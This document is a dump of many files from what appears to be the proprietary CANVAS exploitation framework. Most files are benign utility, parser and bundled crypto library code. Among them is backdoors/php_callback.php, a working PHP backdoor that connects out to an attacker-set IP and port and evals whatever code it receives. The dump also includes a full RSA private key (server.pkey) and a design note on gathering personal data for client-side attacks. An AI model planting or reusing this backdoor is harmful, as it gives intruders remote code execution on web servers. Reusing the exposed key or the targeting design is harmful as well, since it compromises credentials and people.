Stop Post Captures 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/db/oui.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys, os 9 | import struct, gzip 10 | ouigz_path = "oui-stripped.gz" 11 | 12 | __moddir = os.path.dirname(sys.modules[__name__].__file__) 13 | if __moddir != "": 14 | ouigz_path = __moddir + os.path.sep + ouigz_path 15 | 16 | def MACresolve(macaddr): 17 | macaddr = "%02x%02x%02x" % struct.unpack('BBB', macaddr[:3]) 18 | for line in gzip.open(ouigz_path).readlines(): 19 | s = line.split(' ') 20 | mac = s[0] 21 | comp = " ".join(s[1:]).strip() 22 | if macaddr == mac: 23 | return comp 24 | return None 25 | 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/gui/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['canvasguigtk2', 'defaultgui', 'gui_queue', 'newgui', 'text_with_markup', 'loadgtk', 'guiload',"file_browser"] 9 | 10 | # caching, only one gui per session is enough. 11 | global __canvasguimain 12 | __canvasguimain = None 13 | 14 | def loadgtk(): 15 | from canvasguigtk2 import loadgtk as __loadgtk 16 | return __loadgtk() 17 | 18 | def canvasguimain(init_threads=True): 19 | global __canvasguimain 20 | if __canvasguimain == None: 21 | import canvasguigtk2 22 | __canvasguimain = canvasguigtk2.canvasguimain(init_threads=init_threads) 23 | return __canvasguimain 24 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/JavaNode.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | """ 9 | JavaNode.py - used for remote connections from javaNode.jar 10 | """ 11 | 12 | from CANVASNode import CrossPlatformNode 13 | from exploitutils import * 14 | from canvaserror import * 15 | from unixShellNode import unixShellInterfaceResolver 16 | 17 | class JavaNode(CrossPlatformNode): 18 | def __init__(self): 19 | CrossPlatformNode.__init__(self) 20 | self.nodetype="JavaNode" 21 | self.pix="JavaNode" 22 | self.capabilities += ["upload","download"] 23 | self.activate_text() 24 | 25 | def closeself(self): 26 | self.shell.close() 27 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/tests/base.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2006-2007 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | import doctest 15 | import unittest 16 | 17 | from genshi.template.base import Template 18 | 19 | def suite(): 20 | suite = unittest.TestSuite() 21 | suite.addTest(doctest.DocTestSuite(Template.__module__)) 22 | return suite 23 | 24 | if __name__ == '__main__': 25 | unittest.main(defaultTest='suite') 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/filters/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2007 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | import doctest 15 | import unittest 16 | 17 | def suite(): 18 | from genshi.filters.tests import html, i18n 19 | suite = unittest.TestSuite() 20 | suite.addTest(html.suite()) 21 | suite.addTest(i18n.suite()) 22 | return suite 23 | 24 | if __name__ == '__main__': 25 | unittest.main(defaultTest='suite') 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/vsrun.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | echo This is a little CANVAS VisualSploit loader. It tries Python 2.4 and 2.5 3 | echo Copyright Immunity, Inc. 4 | 5 | PATH=c:\GTK\bin;c:\Python24\DLLs;c:\Program Files\Common Files\GTK\2.0\lib;c:\Python24\;c:\Python25\;c:\Python25\DLLs; %PATH% 6 | 7 | @IF not exist VisualSploit\main.py GOTO PRINT 8 | python.exe -W ignore VisualSploit\main.py 9 | @exit 10 | 11 | 12 | :PRINT 13 | echo ************************************************************************* 14 | echo ************************************************************************* 15 | echo You dont seem to have VisualSploit installed, please check 16 | echo http://www.immunityinc.com/products-visualsploit.shtml 17 | echo ************************************************************************* 18 | echo ************************************************************************* 19 | @pause 20 | 21 | 22 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/test/test_allornothing.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # 3 | # Test script for Crypto.Protocol.AllOrNothing 4 | # 5 | 6 | __revision__ = "$Id: test_allornothing.py,v 1.2 2006/07/29 02:52:51 phil Exp $" 7 | 8 | from sancho.unittest import TestScenario, parse_args, run_scenarios 9 | from Crypto.Cipher import AES 10 | from Crypto.Protocol import AllOrNothing 11 | 12 | tested_modules = [ "Crypto.Protocol.AllOrNothing" ] 13 | 14 | class AllOrNothingTest (TestScenario): 15 | 16 | def setup (self): 17 | self.key = 'abcd' * 4 18 | 19 | def shutdown (self): 20 | del self.key 21 | 22 | def check_digest (self): 23 | self.test_stmt('AllOrNothing.AllOrNothing(AES, self.key)') 24 | a = AllOrNothing.AllOrNothing(AES, self.key) 25 | 26 | 27 | if __name__ == "__main__": 28 | (scenarios, options) = parse_args() 29 | run_scenarios(scenarios, options) 30 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/SVR4.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from UnixSystemV import UnixSystemV 9 | 10 | class SVR4(UnixSystemV): 11 | 12 | # 13 | 14 | # "commands" of utssys 15 | UTS_UNAME = 0x0 16 | UTS_UMASK = 0x1 17 | UTS_USTAT = 0x2 18 | UTS_FUSERS = 0x3 19 | 20 | # Flags to UTS_FUSERS 21 | F_FILE_ONLY = 0x1 22 | F_CONTAINED = 0x2 23 | 24 | # fu_flags values 25 | F_CDIR = 0x1 26 | F_RDIR = 0x2 27 | F_TEXT = 0x4 28 | F_MAP = 0x8 29 | F_OPEN = 0x10 30 | F_TRACE = 0x20 31 | F_TTY = 0x40 32 | 33 | def __init__(self): 34 | UnixSystemV.__init__(self) 35 | 36 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/OSF1.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from UNIX import UNIX 9 | from BSD import BSD43 10 | from SVR4 import SVR4 11 | 12 | class OSF1(SVR4, BSD43, UNIX): 13 | 14 | # 15 | 16 | PROT_NONE = 0x0 17 | PROT_READ = 0x1 18 | PROT_WRITE = 0x2 19 | PROT_EXEC = 0x4 20 | 21 | MAP_SHARED = 0x001 22 | MAP_PRIVATE = 0x002 23 | MAP_FIXED = 0x100 24 | 25 | MAP_FAILED = -1 26 | 27 | MAP_FILE = 0x00 28 | MAP_ANON = 0x10 29 | MAP_ANONYMOUS = MAP_ANON 30 | 31 | def __init__(self, *args): 32 | UNIX.__init__(self) 33 | BSD43.__init__(self) 34 | SVR4.__init__(self) 35 | 36 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/TripleDES.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Abstract class for 3DES.""" 3 | 4 | from compat import * #For True 5 | 6 | class TripleDES: 7 | def __init__(self, key, mode, IV, implementation): 8 | if len(key) != 24: 9 | raise ValueError() 10 | if mode != 2: 11 | raise ValueError() 12 | if len(IV) != 8: 13 | raise ValueError() 14 | self.isBlockCipher = True 15 | self.block_size = 8 16 | self.implementation = implementation 17 | self.name = "3des" 18 | 19 | #CBC-Mode encryption, returns ciphertext 20 | #WARNING: *MAY* modify the input as well 21 | def encrypt(self, plaintext): 22 | assert(len(plaintext) % 8 == 0) 23 | 24 | #CBC-Mode decryption, returns plaintext 25 | #WARNING: *MAY* modify the input as well 26 | def decrypt(self, ciphertext): 27 | assert(len(ciphertext) % 8 == 0) 28 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/servcert.cer: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICYDCCAckCBD9y6GswDQYJKoZIhvcNAQEFBQAwdzEQMA4GA1UEBxMHSG91c3RvbjEOMAwGA1UE 3 | CBMFVGV4YXMxCzAJBgNVBAYTAlVTMQ8wDQYDVQQKEwZDb21wYXExITAfBgNVBAsTGENPTVBBUSBJ 4 | bnNpZ2h0IE1hbmFnZXIgNzESMBAGA1UEAxMJQk9CLVcySzNFMB4XDTAzMDkyNTEzMDY1MVoXDTEz 5 | MDkyNTEzMDY1MVowdzEQMA4GA1UEBxMHSG91c3RvbjEOMAwGA1UECBMFVGV4YXMxCzAJBgNVBAYT 6 | AlVTMQ8wDQYDVQQKEwZDb21wYXExITAfBgNVBAsTGENPTVBBUSBJbnNpZ2h0IE1hbmFnZXIgNzES 7 | MBAGA1UEAxMJQk9CLVcySzNFMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmDofzi/b0UOBO 8 | hedIAfpTcB6Iw85MFLN1M+BUymtvizSwrZooGYznHy6krPIL28uMhLXqLY0L5ILo632osYz+M6Ml 9 | iHtPKjlRPLxk2ixQJIygn7/E4kNAL4Vc8wZscFo8eArQw35yRdJmhY0Q7Ms/Sz2gjXO7EH+4j+pf 10 | 3h0bbwIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAKOlg967QntYzLooH7xl6AO/KaUYXBuau3dU4d6T 11 | dmMTM+yLVp6iWoNzX60x+18e2Ki100CLklXe4pKG18fDpyTa/4AQmMCzj/acvzvzi9xw2pp7x8uG 12 | 7JvUqK0fDzfrpgiezYqC5fE9QUc/G09JGfbG7j2s13m4DSBCWAaANDiV 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Hash/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Hashing algorithms 3 | 4 | Hash functions take arbitrary strings as input, and produce an output 5 | of fixed size that is dependent on the input; it should never be 6 | possible to derive the input data given only the hash function's 7 | output. Hash functions can be used simply as a checksum, or, in 8 | association with a public-key algorithm, can be used to implement 9 | digital signatures. 10 | 11 | The hashing modules here all support the interface described in PEP 12 | 247, "API for Cryptographic Hash Functions". 13 | 14 | Submodules: 15 | Crypto.Hash.HMAC RFC 2104: Keyed-Hashing for Message Authentication 16 | Crypto.Hash.MD2 17 | Crypto.Hash.MD4 18 | Crypto.Hash.MD5 19 | Crypto.Hash.RIPEMD 20 | Crypto.Hash.SHA 21 | """ 22 | 23 | __all__ = ['HMAC', 'MD2', 'MD4', 'MD5', 'RIPEMD', 'SHA'] 24 | __revision__ = "$Id: __init__.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 25 | 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/server.pkey: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXQIBAAKBgQDrrJbSxTa4YrlrkKxE+ARAhP8N631pl5zEfe66/dpRb5SqCGNe 3 | W34l6iIgjVcYawlLSOyIGnL29QtwadWBC2MOyAy6bwecdVZOdz8TDU8rwndVRU/7 4 | nts0KCu6JJFc4pA7opptAEvnFcqm09vXh6Ss2hGtJrXIqzewwbdSF/f3tQIDAQAB 5 | AoGAAS/LSqBnmCIXIO2HkIlXLCP/TMikxwVWar7flt10Xfib3QdRyMXZKsO1DEjp 6 | 6VuQnmptlnnbnla5igVeZ9nw073AhxcausvS0lJ7RZ+da1JN6Alz4P+6YYRT/u8c 7 | nW1ewZazAFwAAgCP5zGUQR5x0BgO/eM9VXG6l4ncxuIIwsECQQD98HT1las7m2z0 8 | aSK/JYBlAKhi6/M4jMLya5KpnfBdaaY3P0FgYXv7LrTMwS3rQp28gf902uBxIMtC 9 | k1pRpWrpAkEA7ZYwCeAtTjI8CiHhp1d9CLqtYa4nvB7uVSitmlTAUEHEYyQL0UeB 10 | 7z1+ENdn5683jfrGVutxfMbJN4avxplO7QJBALqtdC29sz2Eito6F9MRDIwzqZXf 11 | AtQFlqKDtjN+6d6h9hETLUpfH7eNpFgJg2o5dJ/JqTQMW4aOpx3wGSuAQVECQDoS 12 | ks1nKUvKxZgobfKsVNiUYJrWqcm2ucTA+6YUfyle2fTts6HE28KxgiX1sOUVk/u1 13 | R1OpmwTHxhk3Z7GgeYUCQQDHo1mbQyQRRmF/V14Hx8XsqPbrKRsmORLzZAyG4/AE 14 | Kz5TN7/EXI4XfpNSBwjbPo68o8nI9LcPn5anJtomiDBD 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Toolkit for crypto and other stuff.""" 3 | 4 | __all__ = ["AES", 5 | "ASN1Parser", 6 | "cipherfactory", 7 | "codec", 8 | "Cryptlib_AES", 9 | "Cryptlib_RC4", 10 | "Cryptlib_TripleDES", 11 | "cryptomath: cryptomath module", 12 | "dateFuncs", 13 | "hmac", 14 | "JCE_RSAKey", 15 | "compat", 16 | "keyfactory", 17 | "OpenSSL_AES", 18 | "OpenSSL_RC4", 19 | "OpenSSL_RSAKey", 20 | "OpenSSL_TripleDES", 21 | "PyCrypto_AES", 22 | "PyCrypto_RC4", 23 | "PyCrypto_RSAKey", 24 | "PyCrypto_TripleDES", 25 | "Python_AES", 26 | "Python_RC4", 27 | "Python_RSAKey", 28 | "RC4", 29 | "rijndael", 30 | "RSAKey", 31 | "TripleDES", 32 | "xmltools"] 33 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/targetrm.py: -------------------------------------------------------------------------------- 1 | """ 2 | targetrm.py 3 | 4 | Target Relational Map 5 | 6 | """ 7 | 8 | DESIGN=""" 9 | 10 | This code provides two main objects: 11 | cEntity - An email address/person/computer/email/file/note/ or other data object 12 | cLink - A link between two entities with an associated time , type ("knows" or "sent email to" or "has") and a description of how we know that (as an object). 13 | 14 | I.E cEntity(person:"Bob Smith") -> cLink("has",via:"mail spool parse at X time") -> cEntity(email:"bob.smith@example.com") 15 | 16 | This information can be filled out many many ways: 17 | o Web spiders 18 | o Facebook API's 19 | o Manual Entry 20 | o DNS Requests: Dig/host/nslookup/etc 21 | o Hacking modules 22 | 23 | One of the main goals is storing information for use in client-side attacks (i.e. hasEmail and hasBrowser). 24 | 25 | This file is the main objects, but not the datastorage routines or the visualization. 26 | 27 | """ 28 | 29 | class cEntity: 30 | pass 31 | 32 | class cLink: 33 | pass 34 | 35 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/runcanvas.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | #Part of CANVAS For licensing information, please refer to your 9 | #Immunity CANVAS licensing documentation 10 | 11 | """ 12 | Runs the CANVAS 13 | """ 14 | 15 | import os, sys 16 | 17 | #here we change location to where our install path is, ideally 18 | our_dir=os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]),'.')) 19 | os.chdir(our_dir) 20 | 21 | #Psyco is turned off now, since it causes random segfaults in 22 | #PyEval_Restricted for some reason? 23 | if True:# and os.environ.has_key('WINGDB_ACTIVE'): 24 | pass 25 | else: 26 | try: 27 | import psyco 28 | psyco.full() 29 | print "Psyco acceleration enabled" 30 | except: 31 | pass 32 | 33 | from canvasengine import canvasmain 34 | 35 | canvasmain() 36 | 37 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/php_callback.php: -------------------------------------------------------------------------------- 1 | 0 ) { 15 | $data3=fread($sock,$size); 16 | if ($data3==FALSE) { 17 | break; 18 | } 19 | $data2=$data2.$data3; 20 | $size-=strlen($data3); 21 | } 22 | return $data2; 23 | } 24 | 25 | $f=fsockopen($ip,$port); 26 | 27 | if ($f) { 28 | while (1) { 29 | $data=read_block($f); 30 | if ($data=="") { 31 | break; 32 | } 33 | try { 34 | eval($data); 35 | } 36 | catch (Exception $e) { 37 | //ignore - probably all is lost, but we'll give it a shot. 38 | } 39 | } 40 | } 41 | ?> 42 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """Python Cryptography Toolkit 4 | 5 | A collection of cryptographic modules implementing various algorithms 6 | and protocols. 7 | 8 | Subpackages: 9 | Crypto.Cipher Secret-key encryption algorithms (AES, DES, ARC4) 10 | Crypto.Hash Hashing algorithms (MD5, SHA, HMAC) 11 | Crypto.Protocol Cryptographic protocols (Chaffing, all-or-nothing 12 | transform). This package does not contain any 13 | network protocols. 14 | Crypto.PublicKey Public-key encryption and signature algorithms 15 | (RSA, DSA) 16 | Crypto.Util Various useful modules and functions (long-to-string 17 | conversion, random number generation, number 18 | theoretic functions) 19 | """ 20 | 21 | __all__ = ['Cipher', 'Hash', 'Protocol', 'Util'] 22 | 23 | __version__ = '1.9a5' 24 | __revision__ = "$Id: __init__.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 25 | 26 | 27 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/test.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # 3 | # Test script for the Python Cryptography Toolkit. 4 | # 5 | 6 | __revision__ = "$Id: test.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 7 | 8 | import os, sys 9 | 10 | 11 | # Add the build directory to the front of sys.path 12 | from distutils.util import get_platform 13 | s = "build/lib.%s-%.3s" % (get_platform(), sys.version) 14 | s = os.path.join(os.getcwd(), s) 15 | sys.path.insert(0, s) 16 | s = os.path.join(os.getcwd(), 'test') 17 | sys.path.insert(0, s) 18 | 19 | from Crypto.Util import test 20 | 21 | args = sys.argv[1:] 22 | quiet = "--quiet" in args 23 | if quiet: args.remove('--quiet') 24 | 25 | if not quiet: 26 | print '\nStream Ciphers:' 27 | print '===============' 28 | 29 | if args: test.TestStreamModules(args, verbose= not quiet) 30 | else: test.TestStreamModules(verbose= not quiet) 31 | 32 | if not quiet: 33 | print '\nBlock Ciphers:' 34 | print '==============' 35 | 36 | if args: test.TestBlockModules(args, verbose= not quiet) 37 | else: test.TestBlockModules(verbose= not quiet) 38 | 39 | 40 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2006-2007 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | """Implementation of the template engine.""" 15 | 16 | from libs.genshi.template.base import Context, Template, TemplateError, \ 17 | TemplateRuntimeError, TemplateSyntaxError, \ 18 | BadDirectiveError 19 | from libs.genshi.template.loader import TemplateLoader, TemplateNotFound 20 | from libs.genshi.template.markup import MarkupTemplate 21 | from libs.genshi.template.text import TextTemplate 22 | 23 | __docformat__ = 'restructuredtext en' 24 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/VFSNode.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | VFSNode.py 4 | 5 | Longer term this node will do things like offer endpoints (ftp, smb, etc) 6 | that you can use to browse this locally, caching data where possible so as 7 | not to hit the network 8 | 9 | """ 10 | 11 | from CANVASNode import CANVASNode 12 | from exploitutils import * 13 | 14 | class VFSNode(CANVASNode): 15 | def __init__(self): 16 | CANVASNode.__init__(self) 17 | self.nodetype="VFSNode" 18 | self.pix="" 19 | self.activate_text() 20 | #self.findInterfaces() 21 | #self.findLocalHosts() 22 | self.capabilities=["VFS","upload","download"] 23 | 24 | def dir(self,directory="."): 25 | return self.shell.dodir(directory) 26 | 27 | def cd(self,directory): 28 | return self.shell.chdir(directory) 29 | 30 | def getcwd(self): 31 | return self.shell.getcwd() 32 | 33 | def mkdir(self,directory): 34 | return self.shell.mkdir(directory) 35 | 36 | 37 | if __name__=="__main__": 38 | node=VFSNode() 39 | 40 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/Cryptlib_RC4.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Cryptlib RC4 implementation.""" 3 | 4 | from cryptomath import * 5 | from RC4 import RC4 6 | 7 | if cryptlibpyLoaded: 8 | 9 | def new(key): 10 | return Cryptlib_RC4(key) 11 | 12 | class Cryptlib_RC4(RC4): 13 | 14 | def __init__(self, key): 15 | RC4.__init__(self, key, "cryptlib") 16 | self.context = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED, cryptlib_py.CRYPT_ALGO_RC4) 17 | cryptlib_py.cryptSetAttribute(self.context, cryptlib_py.CRYPT_CTXINFO_KEYSIZE, len(key)) 18 | cryptlib_py.cryptSetAttributeString(self.context, cryptlib_py.CRYPT_CTXINFO_KEY, key) 19 | 20 | def __del__(self): 21 | cryptlib_py.cryptDestroyContext(self.context) 22 | 23 | def encrypt(self, plaintext): 24 | bytes = stringToBytes(plaintext) 25 | cryptlib_py.cryptEncrypt(self.context, bytes) 26 | return bytesToString(bytes) 27 | 28 | def decrypt(self, ciphertext): 29 | return self.encrypt(ciphertext) -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/sparcscan.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | sparcscan.py 5 | 6 | SPARC lexer for CANVAS 7 | 8 | """ 9 | 10 | from riscscan import * 11 | 12 | class sparclex(risclex): 13 | def __init__(self): 14 | risclex.__init__(self, 'sparc') 15 | 16 | def t_ID(self,t): 17 | r'[.]?[A-Za-z_]+[\w_]*' 18 | if t.value in ["nop", "ret", "retl", "restore"]: 19 | t.type=self.reserved_dict.get(t.value,"NOARGOPCODE") 20 | elif t.value=="a": 21 | t.type=self.reserved_dict.get(t.value,"ANNUL") 22 | elif t.value[0] == "." and t.value[1:] in self.tconsts: 23 | t.type = "TCONST" 24 | elif t.value in self.opcodes: 25 | t.type= self.reserved_dict.get(t.value,"OPCODE") 26 | 27 | #Can't do forward references this way... 28 | #elif t.value in self.labels.keys(): 29 | # t.type= self.reserved_dict.get(t.value,"LABEL") 30 | else: 31 | t.type = self.reserved_dict.get(t.value,"ID") 32 | return t 33 | 34 | 35 | if __name__ == "__main__": 36 | testlexer('sparc') 37 | 38 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/canvashost.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | canvashost.py 4 | 5 | """ 6 | 7 | #Proprietary CANVAS source code - use only under the license agreement 8 | #specified in LICENSE.txt in your CANVAS distribution 9 | #Copyright Immunity, Inc, 2002-2004 10 | #http://www.immunityinc.com/CANVAS/ for more information 11 | 12 | class canvashost: 13 | def __init__(self): 14 | self.name="" 15 | self.os="Unknown" 16 | self.vulnto=[] #all the exploits I'm vuln to 17 | self.knownhosts=[] #all the hosts I can reach from myself 18 | self.knowledge={} #dictionary of lists 19 | 20 | def addVuln(self,vuln,vulndesc): 21 | if vuln not in self.vulnto: 22 | self.vulnto.append((vuln,vulndesc)) 23 | 24 | def addKnownHost(self,host): 25 | self.knownhosts.append(host) 26 | return 27 | 28 | def addKnowledge(self,key,knowledge,percentage): 29 | if key in self.knowledge: 30 | self.knowledge[key]+=[(knowledge,percentage)] 31 | else: 32 | self.knowledge[key]=[(knowledge,percentage)] 33 | return 34 | 35 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/ASN1Parser.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Class for parsing ASN.1""" 3 | from compat import * 4 | from codec import * 5 | 6 | #Takes a byte array which has a DER TLV field at its head 7 | class ASN1Parser: 8 | def __init__(self, bytes): 9 | p = Parser(bytes) 10 | p.get(1) #skip Type 11 | 12 | #Get Length 13 | self.length = self._getASN1Length(p) 14 | 15 | #Get Value 16 | self.value = p.getFixBytes(self.length) 17 | 18 | #Assuming this is a sequence... 19 | def getChild(self, which): 20 | p = Parser(self.value) 21 | for x in range(which+1): 22 | markIndex = p.index 23 | p.get(1) #skip Type 24 | length = self._getASN1Length(p) 25 | p.getFixBytes(length) 26 | return ASN1Parser(p.bytes[markIndex : p.index]) 27 | 28 | #Decode the ASN.1 DER length field 29 | def _getASN1Length(self, p): 30 | firstLength = p.get(1) 31 | if firstLength<=127: 32 | return firstLength 33 | else: 34 | lengthLength = firstLength & 0x7F 35 | return p.get(lengthLength) 36 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 3 | # Copyright (C) 2006 Edgewall Software 4 | # All rights reserved. 5 | # 6 | # This software is licensed as described in the file COPYING, which 7 | # you should have received as part of this distribution. The terms 8 | # are also available at http://genshi.edgewall.org/wiki/License. 9 | # 10 | # This software consists of voluntary contributions made by many 11 | # individuals. For the exact contribution history, see the revision 12 | # history and logs, available at http://genshi.edgewall.org/log/. 13 | 14 | """This package provides various means for generating and processing web markup 15 | (XML or HTML). 16 | 17 | The design is centered around the concept of streams of markup events (similar 18 | in concept to SAX parsing events) which can be processed in a uniform manner 19 | independently of where or how they are produced. 20 | """ 21 | 22 | __docformat__ = 'restructuredtext en' 23 | try: 24 | __version__ = __import__('pkg_resources').get_distribution('Genshi').version 25 | except ImportError: 26 | pass 27 | 28 | import libs.genshi 29 | from libs.genshi.core import * 30 | from libs.genshi.input import ParseError, XML, HTML 31 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tftpy/TftpPacketFactory.py: -------------------------------------------------------------------------------- 1 | from TftpShared import * 2 | from TftpPacketTypes import * 3 | 4 | class TftpPacketFactory(object): 5 | """This class generates TftpPacket objects.""" 6 | def __init__(self): 7 | self.classes = { 8 | 1: TftpPacketRRQ, 9 | 2: TftpPacketWRQ, 10 | 3: TftpPacketDAT, 11 | 4: TftpPacketACK, 12 | 5: TftpPacketERR, 13 | 6: TftpPacketOACK 14 | } 15 | 16 | def create(self, opcode): 17 | tftpassert(self.classes.has_key(opcode), 18 | "Unsupported opcode: %d" % opcode) 19 | 20 | packet = self.classes[opcode]() 21 | 22 | logger.debug("packet is %s" % packet) 23 | return packet 24 | 25 | def parse(self, buffer): 26 | """This method is used to parse an existing datagram into its 27 | corresponding TftpPacket object.""" 28 | logger.debug("parsing a %d byte packet" % len(buffer)) 29 | (opcode,) = struct.unpack("!H", buffer[:2]) 30 | logger.debug("opcode is %d" % opcode) 31 | packet = self.create(opcode) 32 | packet.buffer = buffer 33 | return packet.decode() 34 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/sparcparse.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | sparcparse.py 4 | 5 | SPARC parser for CANVAS 6 | 7 | Some good reference material below: 8 | http://www.owlnet.rice.edu/~comp320/2001/assignments/sparc_subset.html 9 | """ 10 | 11 | from riscparse import * 12 | from sparcassembler import sparcassembler 13 | 14 | class sparcparse(sparcassembler,riscparse): 15 | 16 | register_prefix = '%' 17 | 18 | def __init__(self,runpass=1): 19 | riscparse.__init__(self, 'sparc', runpass) 20 | 21 | def p_linelist_2(self,p): 22 | 'linelist : line linelist' 23 | 24 | #def p_line_7(self,p): 25 | # 'line : OPCODE COMMA ID opcodeargslist ID COLON' 26 | # self.value+=[self.instruction(p[1],[])] 27 | # self.newlabel(p[2]) 28 | 29 | def p_opcodearg_4(self,p): 30 | 'opcodearg : ID' 31 | p[0]=self.resolvelabel(p[1]) 32 | 33 | def p_register(self,p): 34 | 'register : PERCENT ID' 35 | p[0]=p[1]+p[2] 36 | 37 | def getparser(runpass=1): 38 | return procgetparser(sparcparse, runpass=runpass, parsetab_name="sparc_parsetab") 39 | 40 | if __name__ == "__main__": 41 | testparser(getparser) 42 | 43 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/AES.py: 